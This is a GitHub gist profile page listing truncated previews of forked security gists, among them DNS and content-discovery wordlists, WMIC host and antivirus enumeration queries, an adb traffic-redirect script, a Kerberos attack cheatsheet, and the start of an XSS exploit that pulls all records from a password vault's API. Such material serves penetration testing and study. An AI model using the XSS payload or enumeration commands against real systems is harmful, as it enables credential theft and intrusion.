Skip to content

Instantly share code, notes, and snippets.

View samsayen's full-sized avatar
🌿

Sam samsayen

🌿
  • New England
View GitHub Profile
@samsayen
samsayen / all.txt
Created October 13, 2020 14:33 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@samsayen
samsayen / content_discovery_all.txt
Created October 13, 2020 14:32 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
`
~/
~
ים
___
__
_
---
@samsayen
samsayen / password_vault_exploit.js
Created October 1, 2020 14:18 — forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
//Exploit Code by Shawar Khan
var data_chunks = '';
// Capturing Records from API
fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {
// Holds the records in as String
var allrecords = data;
// converting response to JSON
@samsayen
samsayen / tmux-cheatsheet.markdown
Created September 2, 2020 00:57 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@samsayen
samsayen / wmic_cmds.txt
Created July 27, 2020 16:06 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@samsayen
samsayen / redirecttoproxy.sh
Created March 6, 2020 02:51 — forked from CHEF-KOCH/redirecttoproxy.sh
redirect to proxy
#!/bin/sh
# 2016
echo "Loading Firewall ..."
####################
# Disable IPv6 #
####################
adb shell "echo 1 > /proc/sys/net/ipv6/conf/all/disable_ipv6"
adb shell "echo 1 > /proc/sys/net/ipv6/conf/default/disable_ipv6"
@samsayen
samsayen / kerberos_attacks_cheatsheet.md
Last active September 18, 2020 21:39 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Clean up

Clean up shitty formatting
cat powerview-kerbroast.txt | sed 's/[[:space:]]//g'

Bruteforcing

With kerbrute.py:

@samsayen
samsayen / all.txt
Created May 3, 2019 18:41 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
#!/usr/bin/perl -w
use warnings; use strict;
# modified by dek on 2014-05-08
## Settings
our $daemon = 1; #run as a daemon or not (0/1)
our $logging = 1; #logging on or off (0/1)
our $logfile = 'proxydaemon.log';